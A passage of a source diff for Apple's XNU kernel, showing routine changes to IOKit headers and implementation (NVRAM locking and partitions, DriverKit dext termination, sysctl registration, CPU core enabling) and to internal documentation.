"${OUTPUT##*.}" != "plist" -o "${PLIST##*.}" != "plist" ]; then fi shift 2 +if [ $(egrep -c 'CFBundleIdentifier|OSBundleCompatibleVersion|CFBundleVersion' $PLIST) -lt 3 ]; then + echo "error: Invalid input Info.plist $PLIST" 1>&2 + exit 1 +fi + printf \ ' diff --git a/doc/allocators.md b/doc/allocators.md index 55a844ea8..bc9deb57c 100644 --- a/doc/allocators.md +++ b/doc/allocators.md @@ -56,7 +56,7 @@ For all `kalloc` or `kheap_alloc` variants, these advices apply: - If your allocation size is of fixed size, of a sub-page size, and done with the `Z_WAITOK` semantics (allocation can block), consider adding `Z_NOFAIL`, -- If you `bzero` the memory on allocation, prefer passing `Z_ZERO` which can be +- If you `bzero` the memory on allocation, instead pass `Z_ZERO` which can be optimized away more often than not. ### Considerations for zones @@ -83,7 +83,7 @@ Security wise, the following questions need answering: There are several allocation wrappers in XNU, present for various reasons ranging from additional accounting features (IOKit's `IONew`), conformance to -langauge requirements (C++ various `new` operators) or organical historical +language requirements (C++ various `new` operators) or organic historical reasons. `zalloc` and `kalloc` are considered the primitive allocation interfaces which diff --git a/doc/startup.md b/doc/startup.md index 15e587dfe..92e528f8c 100644 --- a/doc/startup.md +++ b/doc/startup.md @@ -189,6 +189,8 @@ Initializes the percpu subsystem. Rank 1: allocates the percpu memory, `percpu_foreach_base` and `percpu_foreach` become usable. +Rank 2: sets up static percpu counters. + `STARTUP_SUB_LOCKS` ------------------- @@ -205,7 +207,6 @@ tracing features). Available hooks are: - Rank 1: `LCK_MTX_DECLARE`. - `STARTUP_SUB_CODESIGNING` ------------------------- @@ -243,6 +244,21 @@ Initializes the Mach IPC subsystem. - Rank last: Final IPC initialization. 
+`STARTUP_SUB_SYSCTL` +------------------------- + +### Description + +Initializes the sysctl kernel subsystem + +### Rank usage + +- Rank 1: automatic `SYSCTL_NODE` registration. +- Rank 2: automatic `SYSCTL_OID` registration. +- Middle: other manual early registrations. +- Last: registrations of dummy nodes in the constant nodes to allow extension. + + `STARTUP_SUB_EARLY_BOOT` ------------------------ @@ -271,5 +287,3 @@ When the kernel locks down: ### Rank usage N/A. - - diff --git a/iokit/DriverKit/IOService.iig b/iokit/DriverKit/IOService.iig index 478a721f9..9c23a9be2 100644 --- a/iokit/DriverKit/IOService.iig +++ b/iokit/DriverKit/IOService.iig @@ -106,6 +106,15 @@ public: virtual kern_return_t Stop(IOService * provider) LOCAL; + /*! @function ClientCrashed + * @discussion Notification for kernel objects of a client crash. + * @param client Attached client. + * @param options No options are currently defined. + * @return kIOReturnSuccess on success. See IOReturn.h for error codes. + */ + virtual kern_return_t + ClientCrashed(IOService * client, uint64_t options); + /*! * @brief Obtain IOKit IORegistryEntryID. * @param registryEntryID IORegistryEntryID for the IOKit object. diff --git a/iokit/DriverKit/IOUserClient.iig b/iokit/DriverKit/IOUserClient.iig index 10c76c852..3c9633969 100644 --- a/iokit/DriverKit/IOUserClient.iig +++ b/iokit/DriverKit/IOUserClient.iig @@ -88,8 +88,9 @@ enum { * @field scalarOutput Array of scalars to return to the caller. * @field scalarOutputCount Count of scalars to return to the caller in scalarOutput. * @field structureOutput An OSData to be returned to the caller as structure output. - * A reference will be consumed by the caller. It is an error to set this field if - * structureOutputDescriptor was passed in + * This field should be set by the driver to an OSData object it created with + * the data to be returned, and the OSData instance will be released by the OS. 
+ * It is an error for the driver to set this field if structureOutputDescriptor was passed in * @field structureOutputDescriptor A IOMemoryDescriptor specified by the caller for structure output. * @field structureOutputMaximumSize Maximum size of structure output specified by caller * or kIOUserClientVariableStructureSize. diff --git a/iokit/IOKit/IOKitKeysPrivate.h b/iokit/IOKit/IOKitKeysPrivate.h index 992e3a9fe..dbc6aaaf5 100644 --- a/iokit/IOKit/IOKitKeysPrivate.h +++ b/iokit/IOKit/IOKitKeysPrivate.h @@ -71,6 +71,12 @@ // care. #define kIONVRAMForceSyncNowPropertyKey "IONVRAM-FORCESYNCNOW-PROPERTY" +// GUID to address variables for the system NVRAM region +#define kIOKitSystemGUID "40A0DDD2-77F8-4392-B4A3-1E7304206516" +#define kIOKitSystemGUIDPrefix (kIOKitSystemGUID ":") +// Internal only key to give access to system region on internal builds +#define kIONVRAMSystemInternalAllowKey "com.apple.private.iokit.system-nvram-internal-allow" + // clientHasPrivilege security token for kIOClientPrivilegeSecureConsoleProcess typedef struct _IOUCProcessToken { @@ -90,12 +96,12 @@ typedef struct _IOUCProcessToken { #define kIOPlatformFunctionHandlerSet "IOPlatformFunctionHandlerSet" #define kIOPlatformFunctionHandlerMaxBusDelay "IOPlatformFunctionHandlerMaxBusDelay" -#define kIOPlatformMaxBusDelay "IOPlatformMaxBusDelay" +#define kIOPlatformMaxBusDelay "IOPlatformMaxBusDelay" #if defined(__i386__) || defined(__x86_64__) #define kIOPlatformFunctionHandlerMaxInterruptDelay "IOPlatformFunctionHandlerMaxInterruptDelay" -#define kIOPlatformMaxInterruptDelay "IOPlatformMaxInterruptDelay" +#define kIOPlatformMaxInterruptDelay "IOPlatformMaxInterruptDelay" #endif /* defined(__i386__) || defined(__x86_64__) */ diff --git a/iokit/IOKit/IOKitServer.h b/iokit/IOKit/IOKitServer.h index 55973bad6..3cb427cfc 100644 --- a/iokit/IOKit/IOKitServer.h +++ b/iokit/IOKit/IOKitServer.h @@ -169,6 +169,7 @@ extern io_object_t iokit_lookup_uext_ref_current_task(mach_port_name_t name); extern 
void iokit_retain_port( ipc_port_t port ); extern void iokit_release_port( ipc_port_t port ); +extern void iokit_make_port_send( ipc_port_t port ); extern void iokit_release_port_send( ipc_port_t port ); extern void iokit_lock_port(ipc_port_t port); diff --git a/iokit/IOKit/IOMemoryDescriptor.h b/iokit/IOKit/IOMemoryDescriptor.h index dc944236e..3ddc39fdf 100644 --- a/iokit/IOKit/IOMemoryDescriptor.h +++ b/iokit/IOKit/IOMemoryDescriptor.h @@ -840,6 +840,7 @@ class IOMemoryMap : public OSObject OSDeclareDefaultStructorsWithDispatch(IOMemoryMap); #ifdef XNU_KERNEL_PRIVATE public: + IOOptionBits fOptions; OSPtr fMemory; OSPtr fSuperMap; mach_vm_size_t fOffset; @@ -847,10 +848,7 @@ public: mach_vm_size_t fLength; task_t fAddressTask; vm_map_t fAddressMap; - IOOptionBits fOptions; upl_t fRedirUPL; - ipc_port_t fRedirEntry; - IOMemoryDescriptor * fOwner; uint8_t fUserClientUnmap; #if IOTRACKING IOTrackingUser fTracking; diff --git a/iokit/IOKit/IONVRAM.h b/iokit/IOKit/IONVRAM.h index 17f91c66a..d556b9fab 100644 --- a/iokit/IOKit/IONVRAM.h +++ b/iokit/IOKit/IONVRAM.h @@ -79,10 +79,12 @@ class IODTNVRAM : public IOService OSDeclareDefaultStructors(IODTNVRAM); private: + friend class IODTNVRAMVariables; + IONVRAMController *_nvramController; OSPtr _registryPropertiesKey; UInt8 *_nvramImage; - IOLock *_variableLock; + IORWLock *_variableLock; IOLock *_controllerLock; UInt32 _commonPartitionOffset; UInt32 _commonPartitionSize; @@ -151,7 +153,11 @@ private: IOReturn removePropertyInternal(const OSSymbol *aKey); IOReturn chooseDictionary(IONVRAMOperation operation, const uuid_t *varGuid, const char *variableName, OSDictionary **dict) const; - bool handleSpecialVariables(const char *name, uuid_t *guid, OSObject *obj, IOReturn *error); + IOReturn flushDict(const uuid_t *guid, IONVRAMOperation op); + bool handleSpecialVariables(const char *name, const uuid_t *guid, const OSObject *obj, IOReturn *error); + OSSharedPtr copyPropertyWithGUIDAndName(const uuid_t *guid, const char 
*name) const; + IOReturn removePropertyWithGUIDAndName(const uuid_t *guid, const char *name); + IOReturn setPropertyWithGUIDAndName(const uuid_t *guid, const char *name, OSObject *anObject); public: virtual bool init(IORegistryEntry *old, const IORegistryPlane *plane) APPLE_KEXT_OVERRIDE; diff --git a/iokit/IOKit/IOPMGR.h b/iokit/IOKit/IOPMGR.h index 66c3a0341..2a5457662 100644 --- a/iokit/IOKit/IOPMGR.h +++ b/iokit/IOKit/IOPMGR.h @@ -32,6 +32,7 @@ extern "C" { #include }; +#include #include /*! @@ -43,15 +44,25 @@ class IOPMGR : public IOService OSDeclareAbstractStructors(IOPMGR); public: + /*! + * @function enableCPUCore + * @abstract Enable a single CPU core. + * @discussion Release a secondary CPU core from reset, and enable + * external IRQ delivery to the core. XNU will not + * invoke this method on the boot CPU's cpu_id. + * @param cpu_id Logical CPU ID of the core. + * @param entry_pa Physical address to use as the reset vector on the + * secondary CPU. Not all platforms will honor this + * parameter; on Apple Silicon RVBAR_EL1 is programmed + * by iBoot. + */ + virtual void enableCPUCore(unsigned int cpu_id, uint64_t entry_pa); + /*! * @function enableCPUCore - * @abstract Enable a single CPU core. - * @discussion Release a secondary CPU core from reset, and enable - * external IRQ delivery to the core. XNU will not - * invoke this method on the boot CPU's cpu_id. - * @param cpu_id Logical CPU ID of the core. + * @abstract Deprecated - Enable a single CPU core. */ - virtual void enableCPUCore(unsigned int cpu_id) = 0; + virtual void enableCPUCore(unsigned int cpu_id); /*! 
* @function disableCPUCore diff --git a/iokit/IOKit/IOPlatformExpert.h b/iokit/IOKit/IOPlatformExpert.h index 6e3e852a3..8954d781c 100644 --- a/iokit/IOKit/IOPlatformExpert.h +++ b/iokit/IOKit/IOPlatformExpert.h @@ -79,7 +79,8 @@ enum { kPEPagingOff, kPEPanicBegin, kPEPanicEnd, - kPEPanicRestartCPUNoCallouts + kPEPanicRestartCPUNoCallouts, + kPEPanicDiagnosticsDone, }; /* Bitmask of details related to panic callouts */ @@ -95,6 +96,7 @@ extern int PEHaltRestartInternal(unsigned int type, uint32_t details); enum { kIOSystemShutdownNotificationStageProcessExit = 0, kIOSystemShutdownNotificationStageRootUnmount = 1, + kIOSystemShutdownNotificationTerminateDEXTs = 2, }; extern void IOSystemShutdownNotification(int stage); diff --git a/iokit/IOKit/IOStatisticsPrivate.h b/iokit/IOKit/IOStatisticsPrivate.h index ba3c5063f..47756e784 100644 --- a/iokit/IOKit/IOStatisticsPrivate.h +++ b/iokit/IOKit/IOStatisticsPrivate.h @@ -239,6 +239,12 @@ public: static void initialize(); + inline static bool + isEnabled() + { + return enabled; + } + static void onKextLoad(OSKext *kext, kmod_info_t *kmod_info); static void onKextUnload(OSKext *kext); static void onClassAdded(OSKext *parentKext, OSMetaClass *metaClass); diff --git a/iokit/IOKit/IOUserServer.h b/iokit/IOKit/IOUserServer.h index a750d3fec..a9c8d122f 100644 --- a/iokit/IOKit/IOUserServer.h +++ b/iokit/IOKit/IOUserServer.h @@ -142,6 +142,7 @@ void serverAdd(IOUserServer * server); void serverRemove(IOUserServer * server); void serverAck(IOUserServer * server); bool serverSlept(void); +void systemHalt(void); }; /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ @@ -204,6 +205,7 @@ public: void setDriverKitUUID(OSKext *kext); void setCheckInToken(IOUserServerCheckInToken *token); void systemPower(bool powerOff); + void systemHalt(void); IOReturn setPowerState(unsigned long state, IOService * service) APPLE_KEXT_OVERRIDE; IOReturn powerStateWillChangeTo(IOPMPowerFlags flags, unsigned long state, IOService 
* service) APPLE_KEXT_OVERRIDE; IOReturn powerStateDidChangeTo(IOPMPowerFlags flags, unsigned long state, IOService * service) APPLE_KEXT_OVERRIDE; diff --git a/iokit/IOKit/pwr_mgt/IOPM.h b/iokit/IOKit/pwr_mgt/IOPM.h index 1f2b651ad..bbcbe802f 100644 --- a/iokit/IOKit/pwr_mgt/IOPM.h +++ b/iokit/IOKit/pwr_mgt/IOPM.h @@ -672,6 +672,7 @@ enum { kIOPSFamilyCodeExternal4 = iokit_family_err(sub_iokit_pmu, 4), kIOPSFamilyCodeExternal5 = iokit_family_err(sub_iokit_pmu, 5), kIOPSFamilyCodeExternal6 = iokit_family_err(sub_iokit_pmu, 6), + kIOPSFamilyCodeExternal7 = iokit_family_err(sub_iokit_pmu, 7), }; // values for kIOPMPSAdapterDetailsErrorFlagsKey diff --git a/iokit/IOKit/pwr_mgt/IOPMPrivate.h b/iokit/IOKit/pwr_mgt/IOPMPrivate.h index 4c1eb9eec..690bb8041 100644 --- a/iokit/IOKit/pwr_mgt/IOPMPrivate.h +++ b/iokit/IOKit/pwr_mgt/IOPMPrivate.h @@ -112,9 +112,6 @@ enum { #define kIOPMMessageRequestUserActive \ iokit_family_msg(sub_iokit_powermanagement, 0x460) -#define kIOPMMessageRequestSystemShutdown \ - iokit_family_msg(sub_iokit_powermanagement, 0x470) - /* @enum SystemSleepReasons * @abstract The potential causes for system sleep as logged in the system event record. 
*/ diff --git a/iokit/Kernel/IOBufferMemoryDescriptor.cpp b/iokit/Kernel/IOBufferMemoryDescriptor.cpp index 7b670bf53..de3e2cdd4 100644 --- a/iokit/Kernel/IOBufferMemoryDescriptor.cpp +++ b/iokit/Kernel/IOBufferMemoryDescriptor.cpp @@ -83,10 +83,9 @@ IOBMDPageProc(iopa_t * a) { kern_return_t kr; vm_address_t vmaddr = 0; - int options = 0;// KMA_LOMEM; kr = kernel_memory_allocate(kernel_map, &vmaddr, - page_size, 0, options, VM_KERN_MEMORY_IOKIT); + page_size, 0, KMA_NONE, VM_KERN_MEMORY_IOKIT); if (KERN_SUCCESS != kr) { vmaddr = 0; diff --git a/iokit/Kernel/IOCatalogue.cpp b/iokit/Kernel/IOCatalogue.cpp index 958022743..a57b083a7 100644 --- a/iokit/Kernel/IOCatalogue.cpp +++ b/iokit/Kernel/IOCatalogue.cpp @@ -73,6 +73,7 @@ OSSharedPtr gIOClassKey; OSSharedPtr gIOProbeScoreKey; OSSharedPtr gIOModuleIdentifierKey; OSSharedPtr gIOModuleIdentifierKernelKey; +OSSharedPtr gIOHIDInterfaceClassName; IORWLock * gIOCatalogLock; #if PRAGMA_MARK @@ -113,6 +114,7 @@ IOCatalogue::initialize(void) gIOProbeScoreKey = OSSymbol::withCStringNoCopy( kIOProbeScoreKey ); gIOModuleIdentifierKey = OSSymbol::withCStringNoCopy( kCFBundleIdentifierKey ); gIOModuleIdentifierKernelKey = OSSymbol::withCStringNoCopy( kCFBundleIdentifierKernelKey ); + gIOHIDInterfaceClassName = OSSymbol::withCStringNoCopy( "IOHIDInterface" ); assert( array && gIOClassKey && gIOProbeScoreKey @@ -808,7 +810,9 @@ IOCatalogue::terminateDriversForModule( { IOReturn ret; OSSharedPtr dict; + OSSharedPtr kext; bool isLoaded = false; + bool isDext = false; /* Check first if the kext currently has any linkage dependents; * in such a case the unload would fail so let's not terminate any @@ -829,6 +833,11 @@ IOCatalogue::terminateDriversForModule( goto finish; } } + kext = OSKext::lookupKextWithIdentifier(moduleName->getCStringNoCopy()); + if (kext) { + isDext = kext->isDriverKit(); + } + dict = OSDictionary::withCapacity(1); if (!dict) { ret = kIOReturnNoMemory; @@ -839,20 +848,25 @@ IOCatalogue::terminateDriversForModule( 
ret = terminateDrivers(dict.get(), NULL); - /* No goto between IOLock calls! - */ - IORWLockWrite(lock); - if (kIOReturnSuccess == ret) { - ret = _removeDrivers(dict.get()); - } + if (isDext) { + /* Force rematching after removing personalities. Dexts are never considered to be "loaded" (from OSKext), + * so we can't call unloadModule() to remove personalities and start rematching. */ + removeDrivers(dict.get(), true); + } else { + /* No goto between IOLock calls! + */ + IORWLockWrite(lock); + if (kIOReturnSuccess == ret) { + ret = _removeDrivers(dict.get()); + } - // Unload the module itself. - if (unload && isLoaded && ret == kIOReturnSuccess) { - ret = unloadModule(moduleName); + // Unload the module itself. + if (unload && isLoaded && ret == kIOReturnSuccess) { + ret = unloadModule(moduleName); + } + IORWLockUnlock(lock); } - IORWLockUnlock(lock); - finish: return ret; } @@ -926,6 +940,8 @@ bool IOCatalogue::startMatching( const OSSymbol * moduleName ) { OSSharedPtr set; + OSSharedPtr kext; + OSSharedPtr servicesToTerminate; if (!moduleName) { return false; @@ -939,6 +955,53 @@ IOCatalogue::startMatching( const OSSymbol * moduleName ) IORWLockRead(lock); + kext = OSKext::lookupKextWithIdentifier(moduleName->getCStringNoCopy()); + if (kext && kext->isDriverKit()) { + /* We're here because kernelmanagerd called IOCatalogueModuleLoaded after launching a dext. + * Determine what providers the dext would match against. If there's something already attached + * to the provider, terminate it. + * + * This is only safe to do for HID dexts. 
+ */ + OSSharedPtr dextPersonalities = kext->copyPersonalitiesArray(); + + if (!dextPersonalities) { + return false; + } + + servicesToTerminate = OSArray::withCapacity(1); + if (!servicesToTerminate) { + return false; + } + + dextPersonalities->iterateObjects(^bool (OSObject * obj) { + OSDictionary * personality = OSDynamicCast(OSDictionary, obj); + OSSharedPtr iter; + IOService * provider; + OSSharedPtr service; + const OSSymbol * category; + + if (personality) { + category = OSDynamicCast(OSSymbol, personality->getObject(gIOMatchCategoryKey)); + if (!category) { + category = gIODefaultMatchCategoryKey; + } + iter = IOService::getMatchingServices(personality); + + while (iter && (provider = OSDynamicCast(IOService, iter->getNextObject()))) { + if (provider->metaCast(gIOHIDInterfaceClassName.get()) != NULL) { + service.reset(provider->copyClientWithCategory(category), OSNoRetain); + if (service) { + servicesToTerminate->setObject(service); + } + } + } + } + + return false; + }); + } + personalities->iterateObjects(^bool (const OSSymbol * key, OSObject * value) { OSArray * array; OSDictionary * dict; @@ -958,6 +1021,22 @@ IOCatalogue::startMatching( const OSSymbol * moduleName ) return false; }); + if (servicesToTerminate) { + servicesToTerminate->iterateObjects(^bool (OSObject * obj) { + IOService * service = OSDynamicCast(IOService, obj); + if (service) { + IOOptionBits terminateOptions = kIOServiceRequired; + if (service->hasUserServer()) { + terminateOptions |= kIOServiceTerminateNeedWillTerminate; + } + if (!service->terminate(terminateOptions)) { + IOLog("%s: failed to terminate service %s-0x%qx with options %08llx for new dext %s\n", __FUNCTION__, service->getName(), service->getRegistryEntryID(), (long long)terminateOptions, moduleName->getCStringNoCopy()); + } + } + return false; + }); + } + // Start device matching. 
if (set->getCount() > 0) { IOService::catalogNewDrivers(set.get()); diff --git a/iokit/Kernel/IODMACommand.cpp b/iokit/Kernel/IODMACommand.cpp index 484656a0d..5da53410f 100644 --- a/iokit/Kernel/IODMACommand.cpp +++ b/iokit/Kernel/IODMACommand.cpp @@ -664,7 +664,7 @@ IODMACommand::walkAll(uint32_t op) } kr = vm_page_alloc_list(state->fCopyPageCount, - KMA_LOMEM | KMA_NOPAGEWAIT, &mapBase); + (kma_flags_t)(KMA_LOMEM | KMA_NOPAGEWAIT), &mapBase); if (KERN_SUCCESS != kr) { DEBG("vm_page_alloc_list(%d) failed (%d)\n", state->fCopyPageCount, kr); mapBase = NULL; diff --git a/iokit/Kernel/IOHibernateIO.cpp b/iokit/Kernel/IOHibernateIO.cpp index 2fc024f6e..3303016d0 100644 --- a/iokit/Kernel/IOHibernateIO.cpp +++ b/iokit/Kernel/IOHibernateIO.cpp @@ -1462,36 +1462,37 @@ IOHibernateWasScreenLocked(void) /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ SYSCTL_STRING(_kern, OID_AUTO, hibernatefile, - CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, gIOHibernateFilename, sizeof(gIOHibernateFilename), ""); SYSCTL_STRING(_kern, OID_AUTO, bootsignature, - CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, gIOHibernateBootSignature, sizeof(gIOHibernateBootSignature), ""); SYSCTL_UINT(_kern, OID_AUTO, hibernatemode, - CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, &gIOHibernateMode, 0, ""); SYSCTL_STRUCT(_kern, OID_AUTO, hibernatestatistics, - CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED, &_hibernateStats, hibernate_statistics_t, ""); -SYSCTL_STRING(_kern_bridge, OID_AUTO, bootsessionuuid, - CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, - gIOHibernateBridgeBootSessionUUIDString, sizeof(gIOHibernateBridgeBootSessionUUIDString), ""); +SYSCTL_OID_MANUAL(_kern_bridge, OID_AUTO, 
bootsessionuuid, + CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + gIOHibernateBridgeBootSessionUUIDString, sizeof(gIOHibernateBridgeBootSessionUUIDString), + sysctl_handle_string, "A", ""); SYSCTL_UINT(_kern, OID_AUTO, hibernategraphicsready, - CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY, + CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_ANYBODY, &_hibernateStats.graphicsReadyTime, 0, ""); SYSCTL_UINT(_kern, OID_AUTO, hibernatewakenotification, - CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY, + CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_ANYBODY, &_hibernateStats.wakeNotificationTime, 0, ""); SYSCTL_UINT(_kern, OID_AUTO, hibernatelockscreenready, - CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY, + CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_ANYBODY, &_hibernateStats.lockScreenReadyTime, 0, ""); SYSCTL_UINT(_kern, OID_AUTO, hibernatehidready, - CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY, + CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_ANYBODY, &_hibernateStats.hidReadyTime, 0, ""); SYSCTL_UINT(_kern, OID_AUTO, hibernatecount, - CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY, + CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_ANYBODY, &gIOHibernateCount, 0, ""); /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ @@ -1561,16 +1562,6 @@ IOHibernateSystemInit(IOPMrootDomain * rootDomain) gIOHibernateFilename[0] = 0; } - sysctl_register_oid(&sysctl__kern_hibernatefile); - sysctl_register_oid(&sysctl__kern_bootsignature); - sysctl_register_oid(&sysctl__kern_hibernatemode); - sysctl_register_oid(&sysctl__kern_hibernatestatistics); - sysctl_register_oid(&sysctl__kern_hibernategraphicsready); - sysctl_register_oid(&sysctl__kern_hibernatewakenotification); - sysctl_register_oid(&sysctl__kern_hibernatelockscreenready); - sysctl_register_oid(&sysctl__kern_hibernatehidready); - sysctl_register_oid(&sysctl__kern_hibernatecount); - gIOChosenEntry = IORegistryEntry::fromPath("/chosen", gIODTPlane); 
if (gIOChosenEntry diff --git a/iokit/Kernel/IOKitDebug.cpp b/iokit/Kernel/IOKitDebug.cpp index 0a4213b38..b61d58a14 100644 --- a/iokit/Kernel/IOKitDebug.cpp +++ b/iokit/Kernel/IOKitDebug.cpp @@ -77,7 +77,7 @@ sysctl_debug_iokit } SYSCTL_PROC(_debug, OID_AUTO, iokit, - CTLTYPE_QUAD | IODEBUG_CTLFLAGS | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_QUAD | IODEBUG_CTLFLAGS | CTLFLAG_KERN | CTLFLAG_LOCKED, &gIOKitDebug, 0, sysctl_debug_iokit, "Q", "boot_arg io"); size_t debug_malloc_size; diff --git a/iokit/Kernel/IOKitKernelInternal.h b/iokit/Kernel/IOKitKernelInternal.h index 1cbb0485d..a829c88d4 100644 --- a/iokit/Kernel/IOKitKernelInternal.h +++ b/iokit/Kernel/IOKitKernelInternal.h @@ -198,6 +198,9 @@ extern bool gCPUsRunning; extern OSSet * gIORemoveOnReadProperties; +extern uint32_t gHaltTimeMaxLog; +extern uint32_t gHaltTimeMaxPanic; + extern "C" void IOKitInitializeTime( void ); extern void IOMachPortInitialize(void); @@ -214,8 +217,6 @@ extern "C" void IOKitKernelLogBuffer(const char * title, const void * buffer, si extern const OSSymbol * gIOCreateEFIDevicePathSymbol; extern "C" void IOSetKeyStoreData(LIBKERN_CONSUMED IOMemoryDescriptor * data); extern "C" void IOSetAPFSKeyStoreData(LIBKERN_CONSUMED IOMemoryDescriptor* data); -extern "C" void IOSetARVRootHashData(LIBKERN_CONSUMED IOMemoryDescriptor* arvData); -extern "C" void IOSetARVManifestData(LIBKERN_CONSUMED IOMemoryDescriptor* arvData); #endif extern const OSSymbol * gAKSGetKey; diff --git a/iokit/Kernel/IOLib.cpp b/iokit/Kernel/IOLib.cpp index 6d3312369..8246f6261 100644 --- a/iokit/Kernel/IOLib.cpp +++ b/iokit/Kernel/IOLib.cpp @@ -451,7 +451,7 @@ IOMallocAligned_internal(struct kalloc_heap *kheap, vm_size_t size, address = 0; /* overflow detected */ } else if (adjustedSize >= page_size) { kr = kernel_memory_allocate(kernel_map, &address, - size, alignMask, 0, IOMemoryTag(kernel_map)); + size, alignMask, KMA_NONE, IOMemoryTag(kernel_map)); if (KERN_SUCCESS != kr) { address = 0; } @@ -465,7 
+465,7 @@ IOMallocAligned_internal(struct kalloc_heap *kheap, vm_size_t size, if (adjustedSize >= page_size) { kr = kernel_memory_allocate(kernel_map, &allocationAddress, - adjustedSize, 0, 0, IOMemoryTag(kernel_map)); + adjustedSize, 0, KMA_NONE, IOMemoryTag(kernel_map)); if (KERN_SUCCESS != kr) { allocationAddress = 0; } @@ -628,7 +628,7 @@ IOKernelAllocateWithPhysicalRestrict(mach_vm_size_t size, mach_vm_address_t maxP || (alignment > page_size); if (contiguous || maxPhys) { - int options = 0; + kma_flags_t options = KMA_NONE; vm_offset_t virt; adjustedSize = size; @@ -643,14 +643,15 @@ IOKernelAllocateWithPhysicalRestrict(mach_vm_size_t size, mach_vm_address_t maxP #endif if (maxPhys <= 0xFFFFFFFF) { maxPhys = 0; - options |= KMA_LOMEM; + options = (kma_flags_t)(options | KMA_LOMEM); } else if (gIOLastPage && (atop_64(maxPhys) > gIOLastPage)) { maxPhys = 0; } } if (contiguous || maxPhys) { kr = kmem_alloc_contig(kernel_map, &virt, size, - alignMask, (ppnum_t) atop(maxPhys), (ppnum_t) atop(alignMask), 0, IOMemoryTag(kernel_map)); + alignMask, (ppnum_t) atop(maxPhys), (ppnum_t) atop(alignMask), + KMA_NONE, IOMemoryTag(kernel_map)); } else { kr = kernel_memory_allocate(kernel_map, &virt, size, alignMask, options, IOMemoryTag(kernel_map)); diff --git a/iokit/Kernel/IOMemoryDescriptor.cpp b/iokit/Kernel/IOMemoryDescriptor.cpp index e4accd208..348cc8975 100644 --- a/iokit/Kernel/IOMemoryDescriptor.cpp +++ b/iokit/Kernel/IOMemoryDescriptor.cpp @@ -5307,12 +5307,6 @@ IOMemoryMap::free() fMemory.reset(); } - if (fOwner && (fOwner != fMemory)) { - LOCK; - fOwner->removeMapping(this); - UNLOCK; - } - if (fSuperMap) { fSuperMap.reset(); } diff --git a/iokit/Kernel/IONVRAM.cpp b/iokit/Kernel/IONVRAM.cpp index 69725d403..06d2efcdb 100644 --- a/iokit/Kernel/IONVRAM.cpp +++ b/iokit/Kernel/IONVRAM.cpp @@ -40,6 +40,7 @@ #include #include #include +#include #define super IOService @@ -52,12 +53,11 @@ // From Apple CHRP Spec #define NVRAM_CHRP_SIG_SYSTEM 0x70 #define 
NVRAM_CHRP_SIG_CONFIG 0x71 -#define NVRAM_CHRP_SIG_FREESPACE 0x7F -#define NVRAM_CHRP_PARTITION_NAME_COMMON "common" -#define NVRAM_CHRP_PARTITION_NAME_SYSTEM "system" -#define NVRAM_CHRP_PARTITION_NAME_SYSTEM_LEGACY "secure" -#define NVRAM_CHRP_PARTITION_NAME_FREESPACE "\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77" +#define NVRAM_CHRP_PARTITION_NAME_COMMON_V1 "common" +#define NVRAM_CHRP_PARTITION_NAME_SYSTEM_V1 "system" +#define NVRAM_CHRP_PARTITION_NAME_COMMON_V2 "2common" +#define NVRAM_CHRP_PARTITION_NAME_SYSTEM_V2 "2system" #define NVRAM_CHRP_LENGTH_BLOCK_SIZE 0x10 // CHRP length field is in 16 byte blocks @@ -112,26 +112,43 @@ OSDefineMetaClassAndStructors(IODTNVRAM, IOService); IOLockUnlock(_controllerLock); \ }) -#define NVRAMLOCK() \ -({ \ +#define NVRAMREADLOCK() \ +({ \ if (preemption_enabled() && !panic_active()) \ - IOLockLock(_variableLock); \ + IORWLockRead(_variableLock); \ }) -#define NVRAMUNLOCK() \ -({ \ +#define NVRAMWRITELOCK() \ +({ \ if (preemption_enabled() && !panic_active()) \ - IOLockUnlock(_variableLock); \ + IORWLockWrite(_variableLock); \ }) -#define NVRAMLOCKASSERT() \ -({ \ - if (preemption_enabled() && !panic_active()) \ - IOLockAssert(_variableLock, kIOLockAssertOwned); \ +#define NVRAMUNLOCK() \ +({ \ + if (preemption_enabled() && !panic_active()) \ + IORWLockUnlock(_variableLock); \ +}) + +#define NVRAMLOCKASSERTHELD() \ +({ \ + if (preemption_enabled() && !panic_active()) \ + IORWLockAssert(_variableLock, kIORWLockAssertHeld); \ }) +#define NVRAMLOCKASSERTEXCLUSIVE() \ +({ \ + if (preemption_enabled() && !panic_active()) \ + IORWLockAssert(_variableLock, kIORWLockAssertWrite); \ +}) + +enum NVRAMPartitionType { + kIONVRAMPartitionSystem, + kIONVRAMPartitionCommon +}; + typedef struct { - const char *name; + NVRAMPartitionType type; 